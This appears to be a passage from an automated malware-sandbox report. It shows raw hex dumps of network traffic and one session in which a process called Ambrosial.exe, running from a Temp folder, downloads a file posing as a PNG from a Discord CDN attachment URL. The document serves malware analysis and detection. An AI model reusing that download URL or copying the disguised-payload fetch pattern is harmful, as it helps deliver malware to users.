                                                                                                                                                                                      2021-10-30 11:52:05 UTC107INData Raw: fa 68 93 5f e1 06 9d 88 e2 c4 74 46 ab 01 fb a0 d7 86 ac dd 91 b5 f9 bd 72 3d e2 78 1c c6 f8 1c 26 a3 fd 8f 76 bd f4 be 38 65 c2 7f e6 86 ef 28 9f 50 8b 81 20 ee e2 48 e7 0b 0a 37 e6 28 be c8 08 95 ad 04 7b 95 91 08 c5 3d 4f 12 cb 20 c0 22 e4 e8 8b e7 6a 9b c3 22 c4 7b bc 58 90 84 d7 d5 c3 ed bc 9c e2 59 1b 5d aa 3e 88 4c 57 d1 2a 8f 54 6d a9 c8 6c 5b e2 30 bf a3 2e 12 f3 49 53 8e 73 e2 f0 23 18 be 93 c6 63 4f e6 18 73 30 42 39 ce 61 7c bd 4c af 0d 22 6b bf 42 e6 13 4e 8b 76 ad a4 23 8d 43 c3 77 c4 70 a2 48 c7 b6 7b bd c4 25 9c 0b 09 fd 71 d1 79 52 9f 38 36 f5 cb 81 42 48 23 de 2e b5 2d 13 50 1c 3b 77 d2 54 37 4e 5a dc 55 73 47 4d d7 bc 3b 6a 72 d2 b4 b3 26 47 4d 7d a3 9c 50 3b 20 c6 77 11 e1 e9 2a 04 8f 8b 2c bf 2a 53 c5 61 34 4f ec a2 13 2d 7b cf 8b 76
                                                                                                                                                                                      Data Ascii: h_tFr=x&v8e(P H7({=O "j"{XY]>LW*Tml[0.ISs#cOs0B9a|L"kBNv#CwpH{%qyR86BH#.-P;wT7NZUsGM;jr&GM}P; w*,*Sa4O-{v
                                                                                                                                                                                      2021-10-30 11:52:05 UTC108INData Raw: e3 7e ee 73 9f 7b 1b ab 79 ff fb df bf 8d 1d 30 da 8e 7d b4 f7 4c 42 d7 f4 0c 2a 13 cb 65 3a 1c 01 1c 02 e7 ca 57 be 72 f7 b1 27 e5 5e fa d2 97 9e 54 5f 66 d7 c2 cf a5 d7 83 1e 47 c3 e1 8f d8 a9 9f 0f 01 38 68 bc 3a 84 dd bc 1b df f8 c6 5b 8b 03 7a ce 9a f4 84 2e 72 c0 e4 40 45 51 bd 72 b4 54 1f c4 30 43 f6 08 c7 73 87 4d 4e a1 ef ac c9 59 23 4f c7 a3 ff ec 96 e1 ac c5 9d 35 1c 35 ed ac 71 ce b0 f3 0f 6a 8e b7 65 56 bc bc e2 1e 42 16 1f d5 41 15 87 d1 3c 88 69 b1 0f 7d 75 2c d7 57 36 33 54 f7 bb 59 fd 08 cd ab 97 c6 4b 9c aa 53 ad 86 8c 34 32 ab b7 6a c3 0c 23 e5 b3 fc aa 5c 4f 9f e5 b5 60 6c 66 44 64 ba 48 cf 66 a4 fc 3e d1 d8 cc 8e d1 08 b1 ad ad 74 2b 4f 37 50 49 4c 47 21 df 71 fb 8c 4a 0f 5e 67 cb 6e 14 16 12 87 3f 60 6f c1 79 71 47 6d 1f 6d 38 3b 32
                                                                                                                                                                                      Data Ascii: ~s{y0}LB*e:Wr'^T_fG8h:[z.r@EQrT0CsMNY#O55qjeVBA<i}u,W63TYKS42j#\O`lfDdHf>t+O7PILG!qJ^gn?`oyqGmm8;2
                                                                                                                                                                                      2021-10-30 11:52:05 UTC110INData Raw: 23 76 95 cd 08 d9 b5 52 5d 3f 50 e5 8d d4 a3 f4 89 d9 41 c3 5d 1c 4f b7 1a b4 0f fc 58 de 1e d7 3b 31 af 4a bb 88 11 dd 4c ba 12 b7 8b 68 3c 09 a3 e8 02 76 9d db 2a 2e 3c 0e 31 0d 23 36 23 64 7d 81 4a 7f 14 cc f4 c5 6d 47 c6 64 8d cd 71 c0 cf 07 ed 63 d1 44 b2 c5 1e db f7 bc e7 3d db d4 e7 2e 8c 43 35 8f 59 8c 59 94 59 b4 59 ac f9 4e 96 ff d7 a5 9c 33 5f d4 c9 e3 6f 95 10 d9 b0 b8 e3 c0 51 9f 1f 8f 50 0e 82 f3 1d df f1 1d 43 8f 3d cf 3a eb ac 93 da ae fb 47 a4 ea df 0c d4 1d 77 f6 7e ff f7 7f 7f 79 fc c9 98 30 4e 80 0d 0e e6 0f fc c0 0f 2c 69 a1 be 0b e2 2e 1a 07 42 d9 2a ee 22 fb 8a 5e 9e 8b 20 4e dd 1c df 9d 35 ed aa 71 1e 5d d0 c9 21 a7 2c 63 e3 bb 6a d1 59 43 c8 d3 f7 d5 b0 8f e7 ca db 95 89 6c 5a 21 b4 74 4e 2b 7f 34 2f 23 cb af ca ec aa f7 b4 e2 99
                                                                                                                                                                                      Data Ascii: #vR]?PA]OX;1JLh<v*.<1#6#d}JmGdqcD=.C5YYYYN3_oQPC=:Gw~y0N,i.B*"^ N5q]!,cjYClZ!tN+4/#
                                                                                                                                                                                      2021-10-30 11:52:05 UTC111INData Raw: 83 ac 1e 42 17 d7 29 1e c9 74 fb 84 9b fe c7 3f fe f1 6d 6a b3 bc d3 ea 89 4f 7c e2 e6 9b be e9 9b 96 5d 20 3e d1 3b 2c f6 38 13 bf fd db bf bd d5 6c ca 47 6d a0 fe 21 ad 39 7c 5c a9 e6 1f f7 1e 16 4e 9c 5c c6 d0 e1 11 e4 6d 6e 73 9b cd 45 2f 7a d1 e5 0d fc a4 d9 ed aa 7e 49 eb a8 4e fd 00 81 38 c2 df 2d bd e2 15 af 48 77 33 f9 11 01 ce e0 d7 7f fd d7 2f 2f 90 c5 f1 89 c7 a0 8d 7f f9 97 7f b9 b4 49 30 fe 38 0b d5 79 90 9e 30 9e 3b e1 f1 0a 6c 38 3e fd 11 7c a7 8e 3f 68 8f f3 8c fe 7f ec 63 1f 5b 74 82 36 32 6e 7e 7c da 23 67 87 5d 38 f2 25 a4 e5 b0 65 54 e7 b4 75 af a9 f2 d4 7f 8d 0f ed 41 f4 28 53 3f cc e1 03 10 f3 00 e1 6f b4 78 44 8d a8 cd cc 27 c6 48 3f 2a e1 9a fc a7 7f fa a7 e5 35 26 08 71 74 fa c1 09 1f 0e 10 c6 4b 0e 5c 74 da 20 86 d0 d2 41 2f 1f
                                                                                                                                                                                      Data Ascii: B)t?mjO|] >;,8lGm!9|\N\mnsE/z~IN8-Hw3//I08y0;l8>|?hc[t62n~|#g]8%eTuA(S?oxD'H?*5&qtK\t A/
                                                                                                                                                                                      2021-10-30 11:52:05 UTC112INData Raw: a1 8b 8e e3 21 8c c4 7b 8c d8 ce d4 37 0a 75 56 a2 f1 89 63 a1 72 bb b0 6b f9 d3 49 35 27 47 e7 6d 96 d7 b2 df 85 e3 32 ce f1 06 0f fc bd 0f 8b 88 3e e5 f7 38 93 e7 4c a4 ea 0b 7a c6 83 45 d5 6d 70 94 f4 8b 4b 1e 73 b2 8b c6 c2 ea 4e 13 d7 29 8e 18 af e7 78 e0 03 1f b8 2c d2 a3 b0 90 ff ce ef fc ce b2 d3 86 03 c8 2f 25 7f f1 17 7f 71 79 bd 05 0b b5 16 70 16 ef ec b1 27 7c e0 03 1f 58 fe 0d c0 89 f7 90 8a 38 37 d6 9e eb 58 ae 6a 2b ed 61 8c ab 5f ba c6 f6 ac bd 3e ab 7e cc ea 1d 6c 10 1f 5b 39 6c 72 d6 b8 ae 38 ff da 59 f3 5d 35 ec 01 e7 8b f1 91 b3 a6 73 2c 41 97 39 6b 8c 85 4b 85 fa e2 7d aa e2 30 9a 07 31 0d a3 3a 98 d1 cf d4 5b 81 7d 2c 33 5b 07 64 e3 5d 9d 83 d6 b9 69 e5 89 ca 66 b9 db 90 e9 e2 64 05 35 00 2e 95 5e a2 c9 ed 69 0f 47 c4 8f 21 aa 38 c4
                                                                                                                                                                                      Data Ascii: !{7uVcrkI5'Gm2>8LzEmpKsN)x,/%qyp'|X87Xj+a_>~l[9lr8Y]5s,A9kK}01:[},3[d]ifd5.^iG!8
                                                                                                                                                                                      2021-10-30 11:52:05 UTC114INData Raw: 83 e6 01 42 f9 78 9f 01 8f 0b d7 51 c6 1d 35 9c 0a be d7 87 93 11 9d 35 ca c4 1f 3e 68 dc 80 d0 65 94 d8 3e 51 e9 2b 46 ed b1 93 a8 ff 8c a1 3f fe 94 83 e6 af eb 20 5f d7 1d fd 66 7c 7c 57 cd 25 3e fe c4 b6 fa 20 10 db ad 74 a5 87 56 1e c4 34 8c ea 60 46 3f 53 6f 86 6c bd 0c f1 d1 7a ab b9 36 3a 07 5b 76 a3 75 64 78 d9 53 1e 7d ce 30 3a 10 99 ae 22 da ce 94 75 66 fb 72 18 8c b4 81 fe 49 84 eb fc e6 19 6f a4 88 ec 23 99 4e b4 f2 8e 0b 71 ec b2 b1 74 5d 6f ac ab fc 5e b9 33 1d fa e7 8f d7 58 2c aa 5f 7e 62 7b 81 0b 5c 60 9b 3a 40 73 ee 4c 82 f6 7a 9b 3d ed a1 e2 f4 d1 61 47 48 8f 9e 32 67 03 07 e7 99 cf 7c e6 56 73 00 63 37 3a 97 64 4b 5d 7e 0e 38 4f fa 2f 50 9c 44 16 6a 3f 36 50 86 73 f8 13 3f f1 13 9b 77 bd eb 5d cb 8f 0f 78 ff da 4f fd d4 4f 6d fe fe ef
                                                                                                                                                                                      Data Ascii: BxQ55>he>Q+F? _f||W%> tV4`F?Solz6:[vudxS}0:"ufrIo#Nqt]o^3X,_~b{\`:@sLz=aGH2g|Vsc7:dK]~8O/PDj?6Ps?w]xOOm
                                                                                                                                                                                      2021-10-30 11:52:05 UTC115INData Raw: dc 19 89 0e 1a b0 63 c7 f7 eb 78 ef 1c 7d c0 b9 a0 4d b4 1b a7 e4 89 4f 7c e2 d6 f2 00 da ac 73 ac 71 11 4a 53 de 25 da 45 b2 f3 99 e9 c4 6c 1e 3a d7 2b cd d8 48 34 46 be ab c6 75 c6 35 e7 0e 1b 79 d8 68 2c e9 17 e7 1c 87 8c b1 93 c3 26 47 8d b9 28 67 cd 77 d5 46 88 7d 99 4d 8b 7d e8 47 75 23 a8 dc 3e eb 1c a5 35 0f d7 e4 45 bd a7 89 1f aa a3 d6 6a b0 18 b1 39 ae f4 da be af be 31 e9 d6 48 24 ea 7a e9 c3 24 1b 9b 6a bc 66 6c 5b 1c 55 99 e3 06 7d e0 e6 ee bc fc e5 2f 2f bf a7 c6 c2 ee b0 00 ad 61 74 3e d1 3e c9 28 aa 9b d0 e3 0a 5b d2 82 36 b0 20 22 2c 9c be 18 52 96 45 d8 df 9d d6 6b 77 cc a3 8e e8 e8 b0 93 c6 e3 ca de 6e 1a bf f0 f4 dd 34 ea d6 82 cd f9 8d ed 75 d8 cd ba d9 cd 6e b6 b9 e2 15 af b8 fc b8 80 f3 ee 0e 1b ff 53 8a c3 76 bf fb dd 6f 73 fe f3
                                                                                                                                                                                      Data Ascii: cx}MO|sqJS%El:+H4Fu5yh,&G(gwF}M}Gu#>5Ej91H$z$jfl[U}//at>>([6 ",REkwn4unSvos
                                                                                                                                                                                      2021-10-30 11:52:05 UTC117INData Raw: 7d ec 63 cb f7 91 70 4a 78 bc a2 dd 23 6e fe 38 6a 2f 7a d1 8b 96 34 68 61 c9 f0 3e 66 32 8b da 37 1b 82 c7 47 d1 82 27 18 87 2b 5d e9 4a 8b 93 82 e3 e1 fd a6 3f fc af 26 8f ae 04 f9 55 3f a5 a7 5d 8c bd 73 b9 cb 5d 6e 73 9d eb 5c a7 dc 4d a3 5d ef 7e f7 bb 97 5d 2d 2f ab 73 d1 1a 5b e5 11 ca 21 f0 73 98 8d d3 47 3e f2 91 cd ab 5e f5 aa e5 15 1f 6f 7c e3 1b 17 c7 91 57 b5 b0 43 46 db 70 c4 d8 69 e3 f1 26 ed c5 39 c3 89 43 8f 0d f5 e3 4c b0 4b c7 ab 46 f8 d3 7a 87 71 55 1b d4 7e 89 74 6a 27 82 3d e3 21 bd 6c a1 3a cf b3 7a 18 29 93 c5 09 63 59 cf 13 6a b7 fa ee 7d 74 91 2d e7 9d f2 72 c8 18 53 89 1c 35 e2 cc 59 39 6a 94 19 a1 6a af 93 e9 44 95 37 5a 4f ab ee 35 b4 8e e1 79 9a 37 a0 f3 a1 b8 c2 a8 cf f2 66 74 51 2a 9b 4c ef 3a a8 3f 22 ef 09 1d e8 ec c6 ae
                                                                                                                                                                                      Data Ascii: }cpJx#n8j/z4ha>f27G'+]J?&U?]s]ns\M]~]-/s[!sG>^o|WCFpi&9CLKFzqU~tj'=!l:z)cYj}t-rS5Y9jjD7ZO5y7ftQ*L:?"
                                                                                                                                                                                      2021-10-30 11:52:05 UTC118INData Raw: 3e f4 95 ed 1a 54 57 eb f8 fb 3c de 5a 5a e3 df c3 db ef f1 e6 eb 39 76 39 a0 b3 af 7a 0e 83 d1 b6 b9 5d 8c bb 08 8f f7 98 b1 15 d9 84 ec 1d 7f e4 38 87 3d d1 69 83 8b a3 b4 eb 5b ba 48 a5 6f b1 a6 8c e3 ed 93 54 e9 8c 4a 7f 98 e8 c6 ce 4d 1e a2 33 21 58 0c b2 85 40 28 ad 7c c2 6c d1 c8 6e 3e 1e b6 74 50 c5 d7 a0 76 55 68 2c 58 28 71 5a af 75 ad 6b 2d 8f ab f4 58 12 e8 23 8f ac 58 28 5f fb da d7 6e b5 7d 78 ac cc f7 b7 f8 82 3e af b3 c0 51 e3 d5 28 d4 03 2c ea fc d5 12 3b 76 de cf 6c 5c 33 7c cc 5d 9c 11 bd 8e c7 b9 97 64 6d 90 ad 42 ec e8 4b 65 2b 51 be ea a6 8c 44 73 4e c7 f4 72 4e 6b 1e 54 79 33 fa a8 53 9a 30 c6 3d ed a8 cd 1e 46 c9 60 1e 50 17 73 90 b8 76 e4 78 bc 89 28 2e 07 50 0e 21 65 88 7b 9b 20 b6 cb a9 f2 5a 65 32 32 fb d9 3a c4 48 39 6c 5c 7a
                                                                                                                                                                                      Data Ascii: >TW<ZZ9v9z]8=i[HoTJM3!X@(|ln>tPvUh,X(qZuk-X#X(_n}x>Q(,;vl\3|]dmBKe+QDsNrNkTy3S0=F`Psvx(.P!e{ Ze22:H9l\z
                                                                                                                                                                                      2021-10-30 11:52:05 UTC119INData Raw: 67 e5 38 5d 3c be 24 0f 3b 39 20 da 1d 61 c7 4c 6f f0 27 64 67 0d 27 4e 3f 48 78 da d3 9e b6 b9 fd ed 6f bf ec d2 b1 d0 3a aa 2b b6 31 6b 33 3a e9 15 8f 76 31 dd 23 b3 6f d5 ab bc 2c 2d 91 13 46 bf 08 71 cc e4 ac 49 af 3e 93 56 39 d5 e7 78 ba 37 57 b2 fc 9e 4e 71 0f 25 9e 16 55 bc 87 d7 07 da f9 92 78 3a 73 d8 d0 c5 47 9f e4 49 bc ae 1e 95 cd 8c 7e e4 38 fb 80 e3 64 a2 3c c7 e7 4a 36 a7 a2 2e c6 67 75 a3 fa 51 bc 7f ab 1c b5 99 83 b5 18 a9 67 ad cd 3e da a8 3a b2 d0 eb f7 74 0c 7b 8c da ed 4a af 7d 47 d5 0e c7 8f d9 6a 5f 6c 5b 4c 8f b0 a6 cc 08 de 5e 49 95 ce a8 f4 47 81 b7 4f b0 50 3a 6e a3 b8 eb 1c dd 54 84 e2 ae 8f a1 88 e9 b5 64 ed ca 68 d9 79 1f bd ed c0 3b c3 f8 ef 4d fe 6a 89 7f 74 60 27 0d c7 4c 36 94 c1 11 61 d7 4c 3f c8 20 8f 5f 87 f2 4a 8f 5b
                                                                                                                                                                                      Data Ascii: g8]<$;9 aLo'dg'N?Hxo:+1k3:v1#o,-FqI>V9x7WNq%Ux:sGI~8d<J6.guQg>:t{J}Gj_l[L^IGOP:nTdhy;Mjt`'L6aL? _J[
                                                                                                                                                                                      2021-10-30 11:52:05 UTC121INData Raw: e9 e9 2a 7e 18 a8 fe 18 c2 da 76 cc d8 ee 03 6f bb a4 4a 67 54 fa 35 f8 f1 44 a6 8b f8 0d 42 71 bf 71 b4 e2 1e 82 c7 8f 03 bd be f7 f2 23 99 bd 74 84 2e 99 4e 7a 27 b3 c9 c4 6d 9d 4c b7 2b a3 f5 65 76 6a 8f 1c b1 e8 9c 49 a2 8d 97 15 55 1c 62 5a 54 73 30 9b a7 1e c6 fc 98 16 1e 87 98 16 95 de a1 0f 23 76 42 7d f6 72 72 ca 10 77 d4 24 ca 93 8c 90 d9 8d 96 dd 07 3a 96 da 9c 49 86 cf 09 1f 2b 85 a3 f1 2c 3d a3 57 dc 51 9b d5 7e 3f 37 11 d5 a3 3a 56 ef a8 c5 46 ec c2 9a ba b2 32 bb b6 49 e5 09 63 bc 4a 57 f4 f2 2b fc 38 3d d6 1e 43 78 f9 2a 0e bb 1e 27 23 3b 5e 0c 61 e6 d8 33 b6 fb c2 db 2c a9 d2 19 95 7e 06 3f 8e c8 74 11 bf 41 f8 0d 63 34 2e 3c 2e 32 1d ec a3 bf 33 8c 1c 6f b6 4d d9 d8 ba 2e 8b ef a2 8b 71 70 fd 61 31 5a 77 d5 2e c4 1d b1 4c 64 87 a8 9c 87
                                                                                                                                                                                      Data Ascii: *~voJgT5DBqq#t.Nz'mL+evjIUbZTs0#vB}rrw$:I+,=WQ~?7:VF2IcJW+8=Cx*'#;^a3,~?tAc4.<.23oM.qpa1Zw.Ld
                                                                                                                                                                                      2021-10-30 11:52:05 UTC122INData Raw: 46 c6 24 ce 57 a5 35 97 25 51 b7 06 6f 0f f1 56 1a 94 f6 3c c5 3d ed f4 d2 22 d3 cf e8 5a b6 ca d7 f5 1b 9d 35 77 d4 08 75 6d 03 ce 58 b6 b3 e6 8f 40 ab 73 90 b5 69 9f 8c d4 af be 67 b6 fb 68 5f 6f ee 8d cc 4d b5 23 b6 87 b4 ce 99 ce 89 c2 18 17 1e d7 b1 3d 3c 92 ef a8 1d 57 e2 80 64 cc d8 38 bb d6 39 43 55 cf 2e f5 57 93 c8 e3 23 cc 8e c3 48 9b 77 e9 d7 e9 a6 37 1e a3 7d e3 3c b8 64 37 02 42 49 d4 7b 88 c4 3a 47 98 b1 3d 0e 9c 49 6d 3d 13 d1 fc ed c9 2c d9 3c 8b ba 9e 4d 15 07 d7 7b 28 62 5a 64 fa 5d 74 0e f9 12 5d c3 08 ce 9a 3b 69 fe f8 93 3c ec 19 e3 e8 a8 69 57 cd 9d b5 5d ce c9 51 e2 63 71 58 ec 3a 06 de c6 28 7e bf 55 3c 4a 85 da 75 c2 51 5b db d0 ac dc 51 9e f8 d1 63 f5 ec c8 6f 89 6c 4e 17 a7 e3 d8 3e 81 aa 78 8b ac cd bb f6 e3 74 9e 83 c3 82 3e
                                                                                                                                                                                      Data Ascii: F$W5%QoV<="Z5wumX@sigh_oM#=<Wd89CU.W#Hw7}<d7BI{:G=Im=,<M{(bZd]t];i<iW]QcqX:(~U<JuQ[QcolN>xt>


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      4192.168.2.349750162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:08 UTC123OUTGET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:08 UTC123INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:08 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 51625
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646f8a3e724e9d-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 113687
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "93a8e487ac8ce3f27b99b41dffc28551"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:08 GMT
                                                                                                                                                                                      Last-Modified: Tue, 31 Aug 2021 22:36:05 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1630449365243747
                                                                                                                                                                                      x-goog-hash: crc32c=1FicIw==
                                                                                                                                                                                      x-goog-hash: md5=k6jkh6yM4/J7mbQd/8KFUQ==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 51625
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdt1ICNIEMaMI42SuNN7i8_NOKopXF6JXUHbBcq-xHfTiJPeMPhUeTgm6F0bxmQuMCMEl8Tr2TrGyPfu_yPBpIc
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vrZ0wk3uz2eQ5OZb9GXGIQzauBeC%2BBB6XMaViIqd2XYanuSJS%2BDwwYA1M6rUc5fdpo6RzDnj4C9mxqB7Tcf5s%2Fag%2BWsWQor35SMJlH9%2Bf55NlmJYMOja00x2EbEny0DTvop%2FiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:08 UTC124INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:08 UTC125INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 c9 3e 49 44 41 54 78 5e ed bd 0b d8 75 df 58 ef bf d4 de ff bd 3b a8 4d bb 1d 7b a7 44 a8 14 39 9f cb 99 12 39 2b 09 1d 9c cb 56 22 42 24 42 22 44 ce 84 10 3f 91 48 07 39 76 ce b9 84 42 42 28 87 4a c2 6e 1f ff 3e f3 59 df d7 f7 bd df fb 1e 87 b9 d6 f3 bc cf fb d3 e7 ba ee 6b 8c 71 8f 7b 8c 39 c6 98 63 ce 71 af 31 d7 9a eb 1c e7 3e f7 b9 ff df e6 08 39 c7 39 ce b1 8d 7d 36 4e 18 e3 ad 74 c6 ff fb 7f 79 37 bc 7c 26 b2 a9 a8 ea 75 2a 1b d7 2b 4e e8 f2 7f ff ef ff 3d 11 66 f1 28 aa 23 0b 77 25 1b 87 11 dd ac
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYsk>IDATx^uX;M{D99+V"B$B"D?H9vBB(Jn>Ykq{9cq1>99}6Nty7|&u*+N=f(#w%
                                                                                                                                                                                      2021-10-30 11:52:08 UTC126INData Raw: 3a 6a 7e c3 f0 38 e8 84 3a 95 4d 4b dc ae 85 06 64 84 51 bb 1e 59 bb a2 4e f1 cc 76 2d aa ab 55 df e8 b1 7a 76 a3 f5 88 59 7b 3f 17 7e 0e a3 de 71 3b b1 6f 5d 8b ca be 55 47 cc 9b 4d 43 ab fe d3 4d 3c ef 9e ee c5 47 74 99 28 cf c3 0a 2f d7 b3 cd 60 ec 35 fe 8a 23 d9 a2 b0 2b 6b da 37 c3 da 36 56 e5 bc df ad 50 52 91 95 a9 68 d9 cc e4 55 21 10 f7 b4 88 fa cc c6 a9 ea 68 d1 cb 1f 61 1f 75 08 bf 76 70 d2 24 38 5b fa ce 19 12 77 d1 70 ce 5c f4 d8 53 df 51 a3 3e 77 d4 b4 8b 26 e7 0c 47 4d ce 5a e6 a8 e9 fb 6a 7a f4 e9 ce 5a e5 b0 55 22 3c 3e 42 65 ef fa d3 e2 a8 55 37 92 4c 1f 75 4a c7 10 88 4b 3c 2d 3c be 96 de 49 c8 f2 33 5d d6 ae a8 cb da 9b e9 46 a9 ea 1c 65 a4 6c cb a6 ca db a5 4d d0 3a 27 9e 47 3c da 8e ea 60 d4 ae a2 65 ef fa 68 17 cb cc a6 21 d3 1d 17
                                                                                                                                                                                      Data Ascii: :j~8:MKdQYNv-UzvY{?~q;o]UGMCM<Gt(/`5#+k76VPRhU!hauvp$8[wp\SQ>w&GMZjzZU"<>BeU7LuJK<-<I3]FelM:'G<`eh!
                                                                                                                                                                                      2021-10-30 11:52:08 UTC127INData Raw: 07 31 ae 30 ea 20 b3 f3 10 7a f1 d3 e2 a8 29 9d c5 5d 2a bd c4 f3 7b 78 e7 47 69 95 a9 f2 32 bd eb 14 27 cc a4 37 69 5c 54 8f f0 78 c6 c8 38 39 95 7d d4 b7 d2 a3 79 23 f1 d8 67 42 1f 23 e9 3c 2e 3c 2e 46 75 30 ab 1f 21 96 6d a5 7b b6 90 e9 8e 13 7e 2e 61 e6 fc ef 5b e7 68 dc 3c 94 78 5a 71 27 a6 9d ec 58 8e b7 2f 8a 16 3b 0f a3 4e a2 3a 3c 74 32 dd 0c ad 3e 42 96 5f 95 c9 f4 6a 9f fa 15 1d 35 2d f6 1a 03 c0 4e 75 11 4a 3c ad b8 c2 4c a7 b0 95 17 c3 d1 bc 91 b4 e2 59 08 b3 3a a8 e2 30 9b 16 99 5e e7 cd 43 9d 23 3f 7f da 49 c3 f9 f2 9d b4 28 72 d0 64 ef e7 1b f4 c8 32 3a 6a ee 9c 29 8f 50 f6 08 eb 84 84 be c4 50 12 d3 2d 81 b5 21 b4 74 e0 f1 23 75 d4 b2 50 12 d3 51 5a f9 ca ab f0 0e 43 4c 67 b4 6c aa bc 4c ef 3a c5 09 25 b0 66 b2 40 0c 1d e9 5a e3 d2 a2 2a
                                                                                                                                                                                      Data Ascii: 10 z)]*{xGi2'7i\Tx89}y#gB#<.<.Fu0!m{~.a[h<xZq'X/;N:<t2>B_j5-NuJ<LY:0^C#?I(rd2:j)PP-!t#uPQZCLglL:%f@Z*
                                                                                                                                                                                      2021-10-30 11:52:08 UTC129INData Raw: a9 bc e0 d8 7e 7d 49 2a 07 2d 5e 87 2a 4b 7c 44 a2 6d af ac da a8 30 d3 89 91 3c 68 e5 67 ba 43 7d f4 e9 27 3a 86 31 1e a5 95 27 e1 64 7b ba 2a b3 16 1f 30 a7 d2 3b 3e e8 d1 5e ba 28 ca 73 62 5a 78 df 3c cc e2 6b c9 ca 47 5d cf a6 65 3f 12 17 d9 38 54 63 13 99 29 3b ab 17 e4 67 ed 16 23 6d e8 a5 21 d3 1d 27 e2 18 8c 9c e3 2c 1e 43 98 d5 41 15 17 e8 24 c2 e3 8c 37 37 72 16 0b 1e b5 f4 c6 9f 7c b7 c9 8e d9 42 f6 55 b9 d8 ce 68 1f 43 f0 b8 13 f5 23 73 2b b3 19 29 57 11 c7 ca db 5f 89 f2 1d af 27 8b b7 74 9e 57 51 95 21 f4 f2 1e 87 2c af 0a 9d ac 1c 64 b6 91 11 9b 16 71 9c 25 72 94 11 77 ce e4 98 e9 11 a7 44 8f 3a e5 ac c9 51 93 93 46 3b b9 b6 e4 8c e9 1a 8b 92 39 6c 72 ae 7a 4e d6 88 a8 2d 99 1e 14 77 5d 46 cb 2e ab cf 89 65 a3 cd a1 39 6a 3a d1 e0 27 5d a1
                                                                                                                                                                                      Data Ascii: ~}I*-^*K|Dm0<hgC}':1'd{*0;>^(sbZx<kG]e?8Tc);g#m!',CA$77r|BUhC#s+)W_'tWQ!,dq%rwD:QF;9lrzN-w]F.e9j:']
                                                                                                                                                                                      2021-10-30 11:52:08 UTC130INData Raw: 1d d1 f8 65 e3 ad 9d 31 39 60 ee 94 45 07 8d 50 e7 47 75 71 6c 84 eb 02 91 53 e6 22 bd 87 2a e3 61 26 90 e9 2b 69 d5 e5 e2 f5 2a de 0a a1 a5 83 96 6d 0c c1 e3 70 28 3f 26 f0 93 1f c3 18 77 a9 f4 99 f8 85 1a f5 aa 47 28 de 1a 98 8c 2a bf a5 97 c4 74 14 cf df 05 f5 cd fb af b8 c4 f3 85 c7 41 f9 d1 ce c9 f4 23 3a 4f 8f c4 21 a6 1d 1f bf 88 eb 62 7e 35 d6 fb d2 8f 32 d2 ae 5d 8f 71 d8 b4 ce d7 4c 7c df 3a f0 38 c4 34 44 9d 16 8a 7f fd d7 7f 5d 42 c1 02 74 8f 7b dc 63 f3 4d df f4 4d 9b af f9 9a af d9 fc b7 ff f6 df 4e 3c f6 d4 17 a6 7d 41 63 01 fb e2 2f fe e2 cd 87 3f fc e1 cd 9b de f4 a6 6d 2d 07 f4 da 31 d2 ce cc 06 aa 7a 62 5c e9 18 66 cc cc ff 11 dd e8 9c f6 b6 21 d5 bd 5e 22 bc fe 2c de d2 cd 86 10 e3 ad 3c 0f 9d 5e 19 a8 e2 91 98 d7 b2 05 8d 1f e3 8b c8
                                                                                                                                                                                      Data Ascii: e19`EPGuqlS"*a&+i*mp(?&wG(*tA#:O!b~52]qL|:84D]Bt{cMMN<}Ac/?m-1zb\f!^",<^
